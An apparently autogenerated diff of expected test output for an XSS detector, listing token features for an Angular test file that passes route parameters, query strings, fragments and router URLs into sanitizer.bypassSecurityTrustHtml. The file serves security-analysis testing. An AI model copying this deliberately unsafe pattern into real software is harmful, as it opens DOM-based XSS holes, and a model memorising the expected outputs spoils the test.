autogenerated/Xss/DomBasedXss/angular2-client.ts:24:10:24:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:10:24:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:10:24:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:20:24:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:20:24:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:20:24:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:20:24:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:20:24:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:47 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:47 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:47 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:47 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:47 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:53 | this.route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:53 | this.route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:53 | this.route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:53 | this.route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:53 | this.route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:62 | this.route.snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:62 | this.route.snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:62 | this.route.snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:62 | this.route.snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:62 | this.route.snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:69 | this.ro ... .params | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:69 | this.ro ... .params | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:69 | this.ro ... .params | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:69 | this.ro ... .params | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:69 | this.ro ... .params | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:73 | this.ro ... ams.foo | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:73 | this.ro ... ams.foo | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:73 | this.ro ... ams.foo | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -11956,6 +90804,81 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:73 | this.ro ... ams.foo | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:73 | this.ro ... ams.foo | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:24:44:24:73 | this.ro ... ams.foo | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:49:24:53 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:49:24:53 | route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:49:24:53 | route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:49:24:53 | route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:49:24:53 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:55:24:62 | snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:55:24:62 | snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:55:24:62 | snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:55:24:62 | snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:55:24:62 | snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:64:24:69 | params | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:64:24:69 | params | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:64:24:69 | params | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:64:24:69 | params | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:64:24:69 | params | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:71:24:73 | foo | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:71:24:73 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:71:24:73 | foo | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:71:24:73 | foo | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:71:24:73 | foo | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:79 | exceptional return of this.sa ... ms.foo) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:79 | exceptional return of this.sa ... ms.foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:79 | exceptional return of this.sa ... ms.foo) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:79 | exceptional return of this.sa ... ms.foo) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:79 | exceptional return of this.sa ... ms.foo) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:79 | this.sa ... ms.foo) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:79 | this.sa ... ms.foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:79 | this.sa ... ms.foo) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:79 | this.sa ... ms.foo) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:5:25:79 | this.sa ... ms.foo) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:10:25:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:10:25:18 | sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:10:25:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:10:25:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:10:25:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:20:25:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:20:25:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:20:25:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:20:25:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:20:25:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:47 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:47 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:47 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:47 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:47 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:53 | this.route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:53 | this.route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:53 | this.route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:53 | this.route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:53 | this.route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:62 | this.route.snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, 